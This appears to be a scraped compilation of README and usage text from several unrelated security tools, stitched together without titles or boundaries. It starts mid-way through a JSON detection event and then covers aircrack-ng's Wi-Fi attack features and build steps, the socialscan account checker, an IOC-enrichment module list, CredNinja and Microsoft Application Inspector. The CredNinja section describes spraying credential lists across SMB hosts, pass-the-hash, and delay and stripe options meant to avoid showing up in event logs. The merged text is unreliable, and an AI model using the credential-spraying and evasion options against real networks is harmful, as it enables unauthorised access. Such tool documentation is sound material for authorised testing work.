    "uid":"-1",
    "data_type":"703",
    "module_name":"syshook",
    "hidden":"1",
    "interrupt_number":"2",
    "time":"1578384927606",
    "local_ip":"192.168.165.152",
    "hostname":"test"
}

• Monitoring: Packet capture and export of data to text files for further processing by third party tools.
• Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
• Testing: Checking WiFi cards and driver capabilities (capture and injection).
• Cracking: WEP and WPA PSK (WPA 1 and 2).

• Along with a few fixes, Airmon-ng now handles more network managers, and persistent ones; no need to run airmon-ng check kill a few times for the network managers that keep restarting.
• Airdecap-ng can now decrypt both sides of the conversation when WDS is in use.
• As usual, we updated WPE patches for freeradius and HostAPd.
• Python 2 is dead as of January 1st, and now all our scripts support Python 3. If you are still running Python 2, don't worry, they are still backward compatible.
• Aircrack-ng contains fixes for a few crashes and other regressions, as well as improved CPU detection in some cases (-u option).

• Aircrack-ng: Added support for MidnightBSD
• Aircrack-ng: Fixed ARM processors display with -u
• Aircrack-ng: Fixed AVX-512F support
• Aircrack-ng: Fixed cracking speed calculation
• Aircrack-ng: Fixed cracking WEP beyond 10k IVS
• Aircrack-ng: Fixed creating new session and added test case
• Aircrack-ng: Fixed encryption display in some cases when prompting for network to crack
• Aircrack-ng: Fixed exiting Aircrack-ng in some cases
• Aircrack-ng: Fixed logical and physical processor count detection
• Aircrack-ng: Fixed PMKID length check
• Aircrack-ng: Various fixes and improvements to WPA cracking engine and its performance
• Airdecap-ng: Decrypt both directions when WDS is in use
• Airdecap-ng: Fixed decrypting WPA PCAP when BSSID changes
• Airgraph-ng: Added support for WPA3
• Airgraph-ng: Switch to argparse
• Airmon-ng: Added detection for wicd, Intel Wireless Daemon (iwd), net_applet
• Airmon-ng: Handle case when avahi keeps getting restarted
• Airmon-ng: Indicates when interface doesn't exist
• Airodump-ng: Added autocolorization interactive key
• Airodump-ng: Added option to read PCAP in realtime (-T)
• Airodump-ng: Added PMKID detection
• Airodump-ng: Added support for GMAC
• Airodump-ng: Added support for WPA3 and OWE (Enhanced Open)
• Airodump-ng: Basic UTF-8 support
• Airodump-ng: Checked management frames are complete before processing IE to avoid switch from WEP to WPA
• Airodump-ng: Display signal when reading from PCAP
• Airodump-ng: Fixed netxml output with hidden SSID
• Airodump-ng: Improved rates calculation for 802.11n/ac
• Airtun-ng: Fixed using -p with -e
• Autoconf: Fixed order of ssl and crypto libraries
• dcrack: Fixed client reporting benchmark
• dcrack: Now handles chunked encoding when communicating (default in Python3)
• Freeradius-WPE: Updated patch for v3.0.20
• General: Added NetBSD endianness support
• General: Added python3 support to scripts
• General: Added script to update autotools on CentOS 7
• General: Added security policy to report security issues
• General: Reorganizing filesystem layout (See PR 2032), and switch to automake 1.14+
• General: Convert to non-recursive make (part of PR 2032)
• General: Deduplicating functions and code cleanups
• General: Fixed packaging on cygwin due to openssl library name change
• General: Fixed SPARC build on Solaris 11
• General: Removed coveralls.io
• General: Updated dependencies in README.md/INSTALLING
• General: Use upstream radiotap libary, as a sub-tree
• General: various fixes and improvements (code, CI, integration tests, coverity)
• HostAPd-WPE: Updated for v2.9
• Manpages: Fixes and improvements
• Tests: Added Integration tests for aireplay-ng, airodump-ng, aircrack-ng, airbase-ng, and others
• Tests: Added tests for airdecap-ng, aircrack-ng

• Autoconf
• Automake
• Libtool
• shtool
• OpenSSL development package or libgcrypt development package.
• Airmon-ng (Linux) requires ethtool.
• On windows, cygwin has to be used and it also requires w32api package.
• On Windows, if using clang, libiconv and libiconv-devel
• Linux: LibNetlink 1 or 3. It can be disabled by passing --disable-libnl to configure.
• pkg-config (pkgconf on FreeBSD)
• FreeBSD, OpenBSD, NetBSD, Solaris and OS X with macports: gmake
• Linux/Cygwin: make and Standard C++ Library development package (Debian: libstdc++-dev)

• If you want SSID filtering with regular expression in airodump-ng (-essid-regex) pcre development package is required.
• If you want to use airolib-ng and '-r' option in aircrack-ng, SQLite development package >= 3.3.17 (3.6.X version or better is recommended)
• If you want to use Airpcap, the 'developer' directory from the CD/ISO/SDK is required.
• In order to build besside-ng, besside-ng-crawler, easside-ng, tkiptun-ng and wesside-ng, libpcap development package is required (on Cygwin, use the Aircap SDK instead; see above)
• For best performance on FreeBSD (50-70% more), install gcc5 (or better) via: pkg install gcc9
• rfkill
• If you want Airodump-ng to log GPS coordinates, gpsd is needed
• For best performance on SMP machines, ensure the hwloc library and headers are installed. It is strongly recommended on high core count systems, it may give a serious speed boost
• CMocka for unit testing
• For intergation testing on Linux only: tcpdump, HostAPd, WPA Supplicant and screen

sudo apt-get install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils

sudo yum install libtool pkgconfig sqlite-devel autoconf automake openssl-devel libpcap-devel pcre-devel rfkill libnl3-devel gcc gcc-c++ ethtool hwloc-devel libcmocka-devel git make file expect hostapd wpa_supplicant iw usbutils tcpdump screen

sudo zypper install autoconf automake libtool pkg-config libnl3-devel libopenssl-1_1-devel zlib-devel libpcap-devel sqlite3-devel pcre-devel hwloc-devel libcmocka-devel hostapd wpa_supplicant tcpdump screen iw gcc-c++ gcc

sudo urpmi autoconf automake libtool pkgconfig libnl3-devel libopenssl-devel zlib-devel libpcap-devel sqlite3-devel pcre-devel hwloc-devel libcmocka-devel hostapd wpa_supplicant tcpdump screen iw gcc-c++ gcc make

sudo apk add gcc g++ make autoconf automake libtool libnl3-dev openssl-dev ethtool libpcap-dev cmocka-dev hostapd wpa_supplicant tcpdump screen iw pkgconf util-linux sqlite-dev pcre-dev linux-headers zlib-dev

pkg install pkgconf shtool libtool gcc9 automake autoconf pcre sqlite3 openssl gmake hwloc cmocka

pkg install pkgconf shtool libtool gcc8 automake autoconf pcre sqlite3 libgcrypt gmake cmocka

pkg_add pkgconf shtool libtool gcc automake autoconf pcre sqlite3 openssl gmake cmocka

brew install autoconf automake libtool openssl shtool pkg-config hwloc pcre sqlite3 libpcap cmocka

c:\cygwin\setup-x86.exe -qnNdO -R C:/cygwin -s http://cygwin.mirror.constant.com -l C:/cygwin/var/cache/setup -P autoconf -P automake -P bison -P gcc-core -P gcc-g++ -P mingw-runtime -P mingw-binutils -P mingw-gcc-core -P mingw-gcc-g++ -P mingw-pthreads -P mingw-w32api -P libtool -P make -P python -P gettext-devel -P gettext -P intltool -P libiconv -P pkg-config -P git -P wget -P curl -P libpcre-devel -P libssl-devel -P libsqlite3-devel

pacman -Sy autoconf automake-wrapper libtool msys2-w32api-headers msys2-w32api-runtime gcc pkg-config git python openssl-devel openssl libopenssl msys2-runtime-devel gcc binutils make pcre-devel libsqlite-devel

./configure <options>

• Compilation:
  make
  
• Compilation on *BSD or Solaris:
  gmake
  

• Execute all unit testing:
  make check
  
• Execute all integration testing (requires root):
  make integration
  
• Installing:
  make install
  
• Uninstall:
  make uninstall
  

• with-airpcap=DIR: needed for supporting airpcap devices on windows (cygwin or msys2 only) Replace DIR above with the absolute location to the root of the extracted source code from the Airpcap CD or downloaded SDK available online. Required on Windows to build besside-ng, besside-ng-crawler, easside-ng, tkiptun-ng and wesside-ng when building experimental tools. The developer pack (Compatible with version 4.1.1 and 4.1.3) can be downloaded at https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html
  
• with-experimental: needed to compile tkiptun-ng, easside-ng, buddy-ng, buddy-ng-crawler, airventriloquist and wesside-ng. libpcap development package is also required to compile most of the tools. If not present, not all experimental tools will be built. On Cygwin, libpcap is not present and the Airpcap SDK replaces it. See --with-airpcap option above.
  
• with-ext-scripts: needed to build airoscript-ng, versuck-ng, airgraph-ng and airdrop-ng. Note: Each script has its own dependencies.
  
• with-gcrypt: Use libgcrypt crypto library instead of the default OpenSSL. And also use internal fast sha1 implementation (borrowed from GIT) Dependency (Debian): libgcrypt20-dev
  
• with-duma: Compile with DUMA support. DUMA is a library to detect buffer overruns and under-runs. Dependencies (debian): duma
  
• disable-libnl: Set-up the project to be compiled without libnl (1 or 3). Linux option only.
  
• without-opt: Do not enable stack protector (on GCC 4.9 and above).
  
• enable-shared: Make OSdep a shared library.
  
• disable-shared: When combined with enable-static, it will statically compile Aircrack-ng.
  
• with-avx512: On x86, add support for AVX512 instructions in aircrack-ng. Only use it when the current CPU supports AVX512.
  
• with-static-simd=: Compile a single optimization in aircrack-ng binary. Useful when compiling statically and/or for space-constrained devices. Valid SIMD options: x86-sse2, x86-avx, x86-avx2, x86-avx512, ppc-altivec, ppc-power8, arm-neon, arm-asimd. Must be used with --enable-static --disable-shared. When using those 2 options, the default is to compile the generic optimization in the binary. --with-static-simd merely allows to choose another one.
  

• Configure and compiling:
  

  ./configure --with-experimental
  make

• Compiling with gcrypt:
  

  ./configure --with-gcrypt
  make

• Installing:
  make install
  
• Installing (strip binaries):
  make install-strip
  
• Installing, with external scripts:
  

  ./configure --with-experimental --with-ext-scripts
  make
  make install

• Testing (with sqlite, experimental and pcre)
  

  ./configure --with-experimental
  make
  make check

• Compiling on OS X with macports (and all options):
  

  ./configure --with-experimental
  gmake

• Compiling on OS X 10.10 with XCode 7.1 and Homebrew:
  

  env CC=gcc-4.9 CXX=g++-4.9 ./configure
  make
  make check

  NOTE: Older XCode ships with a version of LLVM that does not support CPU feature detection; which causes the ./configure to fail. To work around this older LLVM, it is required that a different compile suite is used, such as GCC or a newer LLVM from Homebrew.
  If you wish to use OpenSSL from Homebrew, you may need to specify the location to its' installation. To figure out where OpenSSL lives, run:
  brew --prefix openssl
  Use the output above as the DIR for --with-openssl=DIR in the ./configure line:
  

  env CC=gcc-4.9 CXX=g++-4.9 ./configure --with-openssl=DIR
  make
  make check

• Compiling on FreeBSD with gcc9
  

  env CC=gcc9 CXX=g++9 MAKE=gmake ./configure
  gmake

• Compiling on Cygwin with Airpcap (assuming Airpcap devpack is unpacked in Aircrack-ng directory)
  

  cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src
  cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-osdep
  cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-crypto
  cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-util
  dlltool -D Airpcap_Devpack/bin/x86/airpcap.dll -d build/airpcap.dll.def -l Airpcap_Devpack/bin/x86/libairpcap.dll.a
  autoreconf -i
  ./configure --with-experimental --with-airpcap=$(pwd)
  make

• Compiling on DragonflyBSD with gcrypt using GCC 8
  

  autoreconf -i
  env CC=gcc8 CXX=g++8 MAKE=gmake ./configure --with-experimental --with-gcrypt
  gmake

• Compiling on OpenBSD (with autoconf 2.69 and automake 1.16)
  

  export AUTOCONF_VERSION=2.69
  export AUTOMAKE_VERSION=1.16
  autoreconf -i
  env MAKE=gmake ./configure
  gmake

• Compiling and debugging aircrack-ng
  

  export CFLAGS='-O0 -g'
  export CXXFLAGS='-O0 -g'
  ./configure    
  make
  LD_LIBRARY_PATH=.libs gdb --args ./aircrack-ng [PARAMETERS]

• Use your package manager to download aircrack-ng
• In most cases, they have an old version.

• Install the appropriate "monitor" driver for your card (standard drivers doesn't work for capturing data).
• aircrack-ng suite is command line tools. So, you have to open a commandline Start menu -> Run... -> cmd.exe then use them
• Run the executables without any parameters to have help

1. 100% accuracy: socialscan's query method eliminates the false positives and negatives that often occur in similar tools, ensuring that results are always accurate.
   
2. Speed: socialscan uses asyncio along with aiohttp to conduct all queries concurrently, providing fast searches even with bulk queries involving hundreds of usernames and email addresses. On a test computer with average specs and Internet speed, 100 queries were executed in ~4 seconds.
   
3. Library / CLI: socialscan can be executed through a CLI, or imported as a Python library to be used with existing code.
   
4. Email support: socialscan supports queries for both email addresses and usernames.
   

• Reserved keywords: Most platforms have a set of keywords that they don't allow to be used in usernames
  (A simple test: try checking reserved words like 'admin' or 'home' or 'root' and see if other services mark them as available)
  
• Deleted/banned accounts: Deleted/banned account usernames tend to be unavailable even though the profile pages might not exist
  

> pip install socialscan

> git clone https://github.com/iojw/socialscan.git  
> cd socialscan  
> pip install .

usage: socialscan [list of usernames/email addresses to check]

optional arguments:
  -h, --help            show this help message and exit
  --platforms [platform [platform ...]], -p [platform [platform ...]]
                        list of platforms to query (default: all platforms)
  --view-by {platform,query}
                        view results sorted by platform or by query (default:
                        query)
  --available-only, -a  only print usernames/email addresses that are
                        available and not in use
  --cache-tokens, -c    cache tokens for platforms requiring more than one
                        HTTP request (Snapchat, GitHub, Instagram. Lastfm &
                        Tumblr), reducing total number of requests sent
  --input input.txt, -i input.txt
                        file containg list of queries to execute
  --proxy-list proxy_list.txt
                           file containing list of HTTP proxy servers to execute
                        queries with
  --verbose, -v         show query responses as they are received
  --version             show program's version number and exit

from socialscan.util import Platforms, sync_execute_queries

queries = ["username1", "email2@gmail.com", "mail42@me.com"]
platforms = [Platforms.GITHUB, Platforms.LASTFM]
results = sync_execute_queries(queries, platforms)
for result in results:
    print(f"{result.query} on {result.platform}: {result.message} (Success: {result.success}, Valid: {result.valid}, Available: {result.available})")

username1 on GitHub: Username is already taken (Success: True, Valid: True, Available: False)
username1 on Lastfm: Sorry, this username isn't available. (Success: True, Valid: True, Available: False)
email2@gmail.com on GitHub: Available (Success: True, Valid: True, Available: True)
email2@gmail.com on Lastfm: Sorry, that email address is already registered to another account. (Success: True, Valid: True, Available: False)
mail42@me.com on GitHub: Available (Success: True, Valid: True, Available: True)
mail42@me.com on Lastfm: Looking good! (Success: True, Valid: True, Available: True)

username1
email2@mail.com
username3

• Whois
• ASN
• Geolocation
• Reverse DNS
• Passive DNS

• PassiveTotal
• VirusTotal
• DomainTools
• OPSWAT
• Google SafeBrowsing
• Shodan
• PulseDive
• CSIRTG
• URLscan
• HpHosts
• Blacklist checks
• Spam blacklist checks

• stdout (console output)
  • normalizes result data, printed with headers and subheaders per module
• JSON file
  • beautified output to local file
• Excel
  • uses multiple sheets per IOC type
• MISP
  • commit new indicators
• ThreatConnect
  • commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)

   .d8888b.                       888 888b    888 d8b           d8b          
  d88P  Y88b                      888 8888b   888 Y8P           Y8P          
  888    888                      888 88888b  888                            
  888        888d888 .d88b.   .d88888 888Y88b 888 888 88888b.  8888  8888b.  
  888        888P"  d8P  Y8b d88" 888 888 Y88b888 888 888 "88b "888     "88b 
  888    888 888    88888888 888  888 888  Y88888 888 888  888  888 .d888888 
  Y88b  d88P 888    Y8b.     Y88b 888 888   Y8888 888 888  888  888 888  888 
   "Y8888P"  888     "Y8888   "Y88888 888    Y888 888 888  888  888 "Y888888 
                                                                888          
                                                               d88P          
                                                             888P"           

                    v2.3 (Built 1/26/2018) - Chris King (@raikiasec)

                         For help: ./CredNinja.py -h

usage: CredNinja.py -a accounts_to_test.txt -s systems_to_test.txt
                    [-t THREADS] [--ntlm] [--valid] [--invalid] [-o OUTPUT]
                    [-p PASSDELIMITER] [--delay SECONDS %JITTER]
                    [--timeout TIMEOUT] [--stripe] [--scan]
                    [--scan-timeout SCAN_TIMEOUT] [-h] [--no-color] [--os]
                    [--domain] [--users] [--users-time USERS_TIME]

Quickly check the validity of multiple user credentials across multiple
servers and be notified if that user has local administrator rights on each
server.

Required Arguments:
  -a accounts_to_test.txt, --accounts accounts_to_test.txt
                        A word or file of user credentials to test. Usernames
                        are accepted in the form of "DOMAIN\USERNAME:PASSWORD"
  -s systems_to_test.txt, --servers systems_to_test.txt
                        A word or file of servers to test against. This can
   be a single system, a filename containing a list of
   systems, a gnmap file, or IP addresses in cidr notation.
   Each credential will be tested against each of these
                        servers by attempting to browse C$ via SMB

Optional Arguments:
  -t THREADS, --threads THREADS
                        Number of threads to use. Defaults to 10
  --ntlm                Treat the passwords as NTLM hashes and attempt to
                        pass-the-hash!
  --valid               Only print valid/local admin credentials
  --invalid             Only print invalid credentials
  -o OUTPUT, --output OUTPUT
                        Print results to a file
  -p PASSDELIMITER, --passdelimiter PASSDELIMITER
                        Change the delimiter between the account username and
                        password. Defaults to ":"
  --delay SECONDS %JITTER
                        Delay each request per thread by specified seconds
                        with jitter (example: --delay 20 10, 20 second delay
                        with 10% jitter)
  --timeout TIMEOUT     Amount of seconds wait for data before timing out.
                        Default is 15 seconds
  --stripe              Only test one credential on one host to avoid spamming
                        a single system with multiple login attempts (used to
                        check validity of credentials). This will randomly
                        select hosts from the provided host file.
  --scan                Perform a quick check to see port 445 is available on
                        the host before queueing it up to be processed
  --scan-timeout SCAN_TIMEOUT
                        Sets the timeout for the scan specified by --scan
                        argument. Default of 2 seconds
  -h, --help            Get help about this script's usage
  --no-color            Turns off output color. Written file is always
                        colorless

Additional Information Retrieval:
  --os                  Display the OS of the system if available (no extra
                        request is being sent)
  --domain              Display the primary domain of the system if available
                        (no extra request is being sent)
  --users               List the users that have logged in to the system in
                        the last 6 months (requires LOCAL ADMIN). Returns
                        usernames with the number of days since their home
                        directory was changed. This sends one extra request to
                        each host
  --users-time USERS_TIME
                        Modifies --users to search for users that have logged
                        in within the last supplied amount of days (default
                        100 days)

• Added gnmap file parsing.  The file provided to the --systems (-s) argument can now be a gnmap file (ending in .gnmap)
• Added cidr notation parsing. The IP address provided to the --systems (-s)  argument can now be in cidr notation and it will properly expand the range and test all systems within the ip space (make sure you provide --scan to  scan the systems ahead of time!)
• Made --scan multithreaded so it runs MUCH faster

• Same ability as the previous CredSwissArmy (using credentials and host list to search for Local Admin access across a network via SMB)
• Fully multithreaded!  It is 8x the speed of the old CredSwissArmy!
• Handles errors and complex passwords much better
• Can still pass-the-hash with the "--ntlm" option
• Still has the same arguments as before
• Added "--timeout", which allows scans to get done faster if you wish
• Added "--scan", which runs a quick port 445 scan of the hosts to make sure they are connectable before trying creds on them
• Added "--stripe", which tests each credential once across a random system  (used to validate credentials without appearing suspicious in one systems' event log)
• Added "--delay", which allows you to specify a delay between scanning hosts  to be more covert.  "--delay 10 20" will delay for 10 seconds with a 20% jitter (so between 8-10 seconds)
• Added color output so its more obvious when you get success!

> dotnet AppInspector.dll or on *Windows* simply AppInspector.exe <command> <options>

Microsoft Application Inspector 1.0.17
ApplicationInspector 1.0.17

(c) Microsoft Corporation. All rights reserved

ERROR(S):
  No verb selected.

  analyze        Inspect source directory/file/compressed file (.tgz|zip) against defined characteristics
  tagdiff        Compares unique tag values between two source paths
  tagtest        Test presence of smaller set or custom tags in source (compare or verify modes)
  exporttags     Export default unique rule tags to view what features may be detected
  verifyrules    Verify rules syntax is valid
  help           Display more information on a specific command
  version        Display version information

  Usage: dotnet AppInspector.dll [arguments] [options]

  dotnet AppInspector.dll -description of available commands
  dotnet AppInspector.dll <command> -options description for a given command

  Usage: dotnet AppInspector.dll analyze [arguments] [options]

  Arguments:
  -s, --source-path             Required. Path to source code to inspect (required)
  -o, --output-file-path        Path to output file.  Ignored with -f html option which auto creates output.html
  -f, --output-file-format      (Default: html) Output format [html|json|text]
  -e, --text-format             (Default: Tag:%T,Rule:%N,Ruleid:%R,Confidence:%X,File:%F,Sourcetype:%t,Line:%L,Sample:%m) 
  -r, --custom-rules-path       Custom rules path
  -t, --tag-output-only         (Default: false) Output only contains identified tags
  -i, --ignore-default-rules    (Default: false) Ignore default rules bundled with application
  -d, --allow-dup-tags          (Default: false) Output only contains non-unique tag matches
  -c, --confidence-filters      (Default: high,medium) Output only if matches rule pattern confidence [<value>,] [high|medium|low]
     -k, --include-sample-paths    (Default: false) Include source files with (sample,example,test,.vs,.git) in pathname in analysis
  -x, --console-verbosity       (Default: medium) Console verbosity [high|medium|low|none]
  -l, --log-file-path           Log file path
  -v, --log-file-level          (Default: Error) Log file level [Debug|Info|Warn|Error|Fatal|Off]

  dotnet AppInspector.dll analyze -s /home/user/myproject 

  dotnet AppInspector.dll analyze -s /home/user/myproject -r /my/rules/directory -r /my/other/rules

  dotnet AppInspector.dll analyze -s /home/user/myproject -f json

  Usage: dotnet AppInspector.dll tagdiff [arguments] [options]

  Arguments:
  --src1                        Required. Source 1 to compare (required)
  --src2                        Required. Source 2 to compare (required
  -t, --test-type               (Default: equality) Type of test to run [equality|inequality]
  -r, --custom-rules-path       Custom rules path
  -i, --ignore-default-rules    (Default: false) Ignore default rules bundled with application
  -o, --output-file-path        Path to output file
  -x, --console-verbosity       Console verbosity [high|medium|low
  -l, --log-file-path           Log file path
  -v, --log-file-level          Log file level [error|trace|debug|info]

  dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2

  dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2 -t equality

  dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2 -t inequality

  Usage: dotnet AppInspector.dll tagtest [arguments] [options

  Arguments:
  -s, --source-path             Required. Source to test (required)
  -t, --test-type               (Default: rulespresent) Test to perform [rulespresent|rulesnotpresent]
  -r, --custom-rules-path       Custom rules path 
  -i, --ignore-default-rules    (Default: true) Ignore default rules bundled with application
  -o, --output-file-path        Path to output file
  -x, --console-verbosity       Console verbosity [high|medium|low
  -l, --log-file-path           Log file path
  -v, --log-file-level          Log file level

  dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json

  dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json -t rulespresent

  dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json -t rulesnotpresent

  Usage: dotnet AppInspector.dll exporttags [arguments] [options]

  Arguments:
  -r, --custom-rules-path       Custom rules path
  -i, --ignore-default-rules    (Default: false) Ignore default rules bundled with application
  -o, --output-file-path        Path to output file
  -x, --console-verbosity       Console verbosity [high|medium|low

  dotnet AppInspector.dll exporttags

  dotnet AppInspector.dll exporttags -o /home/user/myproject/exportags.txt

  dotnet AppInspector.dll exporttags -r /home/user/myproject/customrules -o /hom/user/myproject/exportags.txt

  Usage: dotnet AppInspector.dll verifyrules [arguments]

  Arguments:
  -r, --custom-rules-path       Custom rules path
  -i, --ignore-default-rules    (Default: false) Ignore default rules bundled with application
  -o, --output-file-path        Path to output file
  -x, --console-verbosity       Console verbosity [high|medium|low

  dotnet AppInspector.dll verifyrules

  dotnet AppInspector.dll verifyrules -r /home/user/myproject/customrules -i

  dotnet build -c Release

  dotnet publish -c Release -r win-x86
  dotnet publish -c Release -r linux-x64
  dotnet publish -c Release -r osx-x64